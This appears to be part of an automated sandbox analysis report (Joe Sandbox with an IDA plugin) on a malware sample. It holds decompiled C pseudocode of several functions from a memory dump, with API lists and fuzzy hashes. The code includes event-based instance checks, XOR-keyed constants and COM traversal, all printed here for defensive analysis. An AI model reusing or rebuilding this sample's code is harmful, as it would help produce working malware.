				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x5ea348; // 0x25dd5a8
				_t2 = _t22 + 0x5eb7bb; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x5ea2ec >= 5) {
					_t30 = E005E3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x5ea2ec =  *0x5ea2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E005E56B9(_t50, _t49);
					_t34 = E005E77A5(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x5ea2ec < 5) {
							 *0x5ea2ec =  *0x5ea2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E005E63F6();
					HeapFree( *0x5ea2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x5ea3e0; // 0x2bc9c20
				if(RtlAllocateHeap( *0x5ea2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E005E2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















          0x005e35d9
          0x005e35e0
          0x005e35e4
          0x005e35e9
          0x005e35f4
          0x005e3604
          0x005e3653
          0x005e3658
          0x005e3658
          0x005e365b
          0x005e365f
          0x005e3699
          0x005e3699
          0x005e369f
          0x005e36a6
          0x005e36a6
          0x005e3661
          0x005e3664
          0x005e3666
          0x005e3673
          0x005e3675
          0x005e367c
          0x005e36b3
          0x005e36b8
          0x005e36ba
          0x005e36bc
          0x005e36bc
          0x00000000
          0x005e36ba
          0x005e367e
          0x005e3685
          0x005e3693
          0x00000000
          0x005e3693
          0x005e3606
          0x005e3621
          0x005e363b
          0x00000000
          0x005e363b
          0x005e3634
          0x00000000

          APIs
          • wsprintfA.USER32 ref: 005E35F4
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E3619
            • Part of subcall function 005E2B91: GetTickCount.KERNEL32 ref: 005E2BA8
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2BF5
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C12
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C34
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C5B
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2C7C
            • Part of subcall function 005E2B91: wsprintfA.USER32 ref: 005E2CA7
            • Part of subcall function 005E2B91: HeapFree.KERNEL32(00000000,?), ref: 005E2CBA
          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 005E3693
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: wsprintf$Heap$Free$AllocateCountTick
          • String ID: Uqt
          • API String ID: 1307794992-2320327147
          • Opcode ID: 7b4dd349412ac40b4dc166b1f8b4c20df8e48dc062be97db35e8ef7e2de6d415
          • Instruction ID: d7d477af1c476e1ba56779e70ea42d94f8e9fa053410e0d8de78ee5886722dc7
          • Opcode Fuzzy Hash: 7b4dd349412ac40b4dc166b1f8b4c20df8e48dc062be97db35e8ef7e2de6d415
          • Instruction Fuzzy Hash: B0312175500189EBCB05DF76DC88ADA3BBDFB58351F108422F985AB251D730AA48DBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E6CDF Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
          Download Yara Rule
          C-Code - Quality: 46%
          			E005E6CDF(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x5ea348; // 0x25dd5a8
					_t5 = _t103 + 0x5eb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x5e9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x5ea348; // 0x25dd5a8
												_t28 = _t109 + 0x5eb0e4; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x5ea348; // 0x25dd5a8
														_t33 = _t79 + 0x5eb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































          0x005e6ce4
          0x005e6ced
          0x005e6cee
          0x005e6cf2
          0x005e6cf8
          0x005e6cfe
          0x005e6d07
          0x005e6d0d
          0x005e6d17
          0x005e6d19
          0x005e6d1f
          0x005e6d24
          0x005e6d2f
          0x005e6d35
          0x005e6d3a
          0x005e6e5c
          0x005e6d40
          0x005e6d40
          0x005e6d4d
          0x005e6d53
          0x005e6d59
          0x005e6d5d
          0x005e6d63
          0x005e6d70
          0x005e6d74
          0x005e6d7a
          0x005e6d7d
          0x005e6d85
          0x005e6d86
          0x005e6d8a
          0x005e6d8e
          0x005e6d91
          0x005e6d94
          0x005e6d9a
          0x005e6da3
          0x005e6da9
          0x005e6daa
          0x005e6dad
          0x005e6dae
          0x005e6daf
          0x005e6db7
          0x005e6db8
          0x005e6db9
          0x005e6dbb
          0x005e6dbf
          0x005e6dc3
          0x00000000
          0x00000000
          0x005e6dc9
          0x005e6dd2
          0x005e6dd8
          0x005e6de2
          0x005e6de6
          0x005e6de8
          0x005e6df5
          0x005e6df9
          0x005e6e01
          0x005e6e06
          0x005e6e18
          0x005e6e1a
          0x005e6e20
          0x005e6e20
          0x005e6e29
          0x005e6e29
          0x005e6e2b
          0x005e6e31
          0x005e6e31
          0x005e6e34
          0x005e6e3a
          0x005e6e3d
          0x005e6e46
          0x00000000
          0x00000000
          0x00000000
          0x005e6e46
          0x005e6d9a
          0x005e6d94
          0x005e6d7d
          0x005e6e4c
          0x005e6e4c
          0x005e6e52
          0x005e6e52
          0x005e6e58
          0x005e6e58
          0x005e6e61
          0x005e6e67
          0x005e6e67
          0x005e6d24
          0x005e6e70

          APIs
          • SysAllocString.OLEAUT32(005E9284), ref: 005E6D2F
          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 005E6E10
          • SysFreeString.OLEAUT32(00000000), ref: 005E6E29
          • SysFreeString.OLEAUT32(?), ref: 005E6E58
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$Free$Alloclstrcmp
          • String ID:
          • API String ID: 1885612795-0
          • Opcode ID: 6905cd5d8c93982c28a2ca76b20d60f0b27ddfac666e06116f5078d14249ff39
          • Instruction ID: 45552744555ee4adcb65fcbdad52e60be57f60cb3cc03a7056a953797ad4f5cc
          • Opcode Fuzzy Hash: 6905cd5d8c93982c28a2ca76b20d60f0b27ddfac666e06116f5078d14249ff39
          • Instruction Fuzzy Hash: 05518E75D0050AEFCB04DFA8C8889AFBBB9FF88744B144598E915EB260D731AD01CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
          Download Yara Rule
          APIs
          • SysAllocString.OLEAUT32(?), ref: 005E59B8
          • SysFreeString.OLEAUT32(00000000), ref: 005E5A9D
            • Part of subcall function 005E6CDF: SysAllocString.OLEAUT32(005E9284), ref: 005E6D2F
          • SafeArrayDestroy.OLEAUT32(00000000), ref: 005E5AF0
          • SysFreeString.OLEAUT32(00000000), ref: 005E5AFF
            • Part of subcall function 005E77E3: Sleep.KERNEL32(000001F4), ref: 005E782B
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree$ArrayDestroySafeSleep
          • String ID:
          • API String ID: 3193056040-0
          • Opcode ID: a0c08c314a35dd9bfea5257c9410a1856f50cf4820b74adcbc8a622d80eab4f6
          • Instruction ID: 324bd6272b7de5d8668a10c7ec17314e9a4767674d9d1951856be9956e1bf0b8
          • Opcode Fuzzy Hash: a0c08c314a35dd9bfea5257c9410a1856f50cf4820b74adcbc8a622d80eab4f6
          • Instruction Fuzzy Hash: 8151C47550064AAFDB05DFA9C888ADEBBB5FFC8705F148528E545DB220EB30ED45CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4781 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
          Download Yara Rule
          C-Code - Quality: 85%
          			E005E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E005E61EF(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E005E6725(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E005E7477(_t101,  &_v428, _a8, _t96 - _t81);
					E005E7477(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E005E6725(_t101, 0x5ea1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E005E6725(_a16, _a4);
						E005E7894(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L005E82DA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L005E82D4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E005E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E005E6E71(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E005E10A0(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x5ea1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















          0x005e4784
          0x005e4790
          0x005e4796
          0x005e479b
          0x005e479f
          0x005e4911
          0x005e4915
          0x005e4915
          0x005e47a5
          0x005e47a9
          0x005e47ad
          0x005e47b0
          0x005e47bb
          0x005e47c1
          0x005e47c6
          0x005e47c9
          0x005e47e3
          0x005e47f2
          0x005e47fe
          0x005e4808
          0x005e480d
          0x005e480f
          0x005e4812
          0x005e48c9
          0x005e48cf
          0x005e48e0
          0x005e48f3
          0x005e4909
          0x00000000
          0x005e490e
          0x005e481b
          0x005e4822
          0x005e4826
          0x005e482c
          0x005e482e
          0x005e4830
          0x005e4832
          0x005e4834
          0x005e483e
          0x005e4843
          0x005e4845
          0x005e4847
          0x005e4848
          0x005e4849
          0x005e484a
          0x005e4851
          0x005e4858
          0x005e485b
          0x005e485b
          0x005e4828
          0x005e4828
          0x005e4828
          0x005e4863
          0x005e486b
          0x005e4877
          0x005e487c
          0x005e487c
          0x005e4881
          0x00000000
          0x00000000
          0x005e4883
          0x005e4886
          0x005e4893
          0x00000000
          0x00000000
          0x005e4895
          0x005e4895
          0x005e48a2
          0x005e487c
          0x005e4881
          0x00000000
          0x00000000
          0x00000000
          0x005e4881
          0x005e48ac
          0x005e48af
          0x005e48b2
          0x005e48b9
          0x005e48b9
          0x005e48c6
          0x00000000
          0x005e48c6
          0x005e47b2
          0x005e47b6
          0x005e47b7
          0x005e47b9
          0x00000000
          0x00000000
          0x00000000
          0x005e47b9
          0x00000000

          APIs
          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 005E4834
          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 005E484A
          • memset.NTDLL ref: 005E48F3
          • memset.NTDLL ref: 005E4909
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: memset$_allmul_aulldiv
          • String ID:
          • API String ID: 3041852380-0
          • Opcode ID: bd9e5ec1d8c37d17392c3cef6c1ed2c64564c4150628b5af3ca112daaf4ec872
          • Instruction ID: b61b340228b8c1d52585d633cfa06ae21b6e69bd7f777e39ec854aab2b8a6d58
          • Opcode Fuzzy Hash: bd9e5ec1d8c37d17392c3cef6c1ed2c64564c4150628b5af3ca112daaf4ec872
          • Instruction Fuzzy Hash: EB41F471A00299ABDB189F69CC49BEE7B75FF85310F004569F989A7181EB70AE44CF80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E49D0 Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
          Download Yara Rule
          C-Code - Quality: 87%
          			E005E49D0(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x5ea310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x5ea348; // 0x25dd5a8
				_t3 = _t8 + 0x5eb7b4; // 0x61636f4c
				_t25 = 0;
				_t30 = E005E74EC(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x5ea34c, 1, 0, _t30);
					E005E61DA(_t30);
				}
				_t12 =  *0x5ea2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E005E30D5() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E005E37DF(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x5ea124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E005E23C4(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














          0x005e49d1
          0x005e49d8
          0x005e49e2
          0x005e49e6
          0x005e49ec
          0x005e49fb
          0x005e4a02
          0x005e4a06
          0x005e4a18
          0x005e4a1a
          0x005e4a1a
          0x005e4a1f
          0x005e4a26
          0x005e4a7d
          0x005e4a7d
          0x005e4a83
          0x005e4a85
          0x005e4a85
          0x005e4a8f
          0x005e4a93
          0x005e4aa5
          0x005e4aa5
          0x005e4aa9
          0x005e4aaf
          0x005e4aaf
          0x00000000
          0x005e4a3f
          0x005e4a44
          0x005e4a4c
          0x005e4a50
          0x005e4a54
          0x005e4a54
          0x005e4a61
          0x005e4a65
          0x005e4a69
          0x005e4abe
          0x005e4ac4
          0x005e4ac4
          0x005e4a77
          0x005e4a7b
          0x005e4ab2
          0x005e4ab4
          0x005e4ab7
          0x005e4ab7
          0x00000000
          0x005e4ab4
          0x005e4a7b
          0x00000000
          0x005e4a65

          APIs
            • Part of subcall function 005E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02BC9E18,00000000,?,?,43175AC3,00000005,005EA00C,4D283A53,?,?), ref: 005E7522
            • Part of subcall function 005E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 005E7546
            • Part of subcall function 005E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 005E754E
          • CreateEventA.KERNEL32(005EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4A11
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • WaitForSingleObject.KERNEL32(00000000,00004E20,005E6A95,00000000,00000000,?,00000000,?,005E6A95,?,?,?), ref: 005E4A71
          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4A9F
          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,005E6A95,?,?,?), ref: 005E4AB7
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
          • String ID:
          • API String ID: 73268831-0
          • Opcode ID: 6e8f8af00ba701a611cab67a1667c76272fa16cf6d8ae7ee8a6890babdc1a62a
          • Instruction ID: 6f3bbd97d15c0922a014193331d256806c8c1167dc053c2725cb93cf0bf36ddf
          • Opcode Fuzzy Hash: 6e8f8af00ba701a611cab67a1667c76272fa16cf6d8ae7ee8a6890babdc1a62a
          • Instruction Fuzzy Hash: 6E2106736803D15BC73D9B668C8CA6B7AEBFB98724B050635FDC19B141DB20DC048B58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E69E6 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
          Download Yara Rule
          C-Code - Quality: 39%
          			E005E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E005E2A3D(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E005E28B3(_t23);
						}
					}
					return _t38;
				}
				if(E005E6ADC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x5ea34c, 1, 0,  *0x5ea3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E005E5704(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E005E4C94(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E005E7220(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E005E49D0( &_v32, _t39);
					goto L13;
				}
			}












          0x005e69e6
          0x005e69f3
          0x005e69f9
          0x005e69fa
          0x005e69fb
          0x005e69fc
          0x005e69fd
          0x005e6a01
          0x005e6a0d
          0x005e6a11
          0x005e6a99
          0x005e6a99
          0x005e6a9c
          0x005e6a9e
          0x005e6aa6
          0x005e6aac
          0x005e6aaf
          0x005e6aaf
          0x005e6aac
          0x005e6aba
          0x005e6aba
          0x005e6a24
          0x005e6a26
          0x005e6a26
          0x005e6a3d
          0x005e6a41
          0x005e6a44
          0x005e6a4f
          0x005e6a56
          0x005e6a56
          0x005e6a5f
          0x005e6a63
          0x005e6a71
          0x005e6a65
          0x005e6a65
          0x005e6a66
          0x005e6a67
          0x005e6a68
          0x005e6a69
          0x005e6a6a
          0x005e6a6a
          0x005e6a76
          0x005e6a79
          0x005e6a7d
          0x005e6a7f
          0x005e6a7f
          0x005e6a86
          0x00000000
          0x005e6a88
          0x005e6a88
          0x005e6a95
          0x00000000
          0x005e6a95

          APIs
          • CreateEventA.KERNEL32(005EA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 005E6A37
          • SetEvent.KERNEL32(00000000), ref: 005E6A44
          • Sleep.KERNEL32(00000BB8), ref: 005E6A4F
          • CloseHandle.KERNEL32(00000000), ref: 005E6A56
            • Part of subcall function 005E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj^,?,?,?,?,?,005E6A76,?), ref: 005E57DE
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
          • String ID:
          • API String ID: 2559942907-0
          • Opcode ID: f67abf8cef2ffc553e6d02c1497d5e73cccdcca310e6ea46137d3b68ca6a9ede
          • Instruction ID: d23bd671d7aa4fb9166d2f23428647db88da21ff55df5ebfb94a6aad6069f3b8
          • Opcode Fuzzy Hash: f67abf8cef2ffc553e6d02c1497d5e73cccdcca310e6ea46137d3b68ca6a9ede
          • Instruction Fuzzy Hash: B8218872D00199EBCB24AFE698898DE7FA9FB543D0B058439FA91B7101D730AD458751
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4461 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
          Download Yara Rule
          C-Code - Quality: 78%
          			E005E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E005E33DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














          0x005e446d
          0x005e4471
          0x005e4472
          0x005e4473
          0x005e4475
          0x005e4477
          0x005e447a
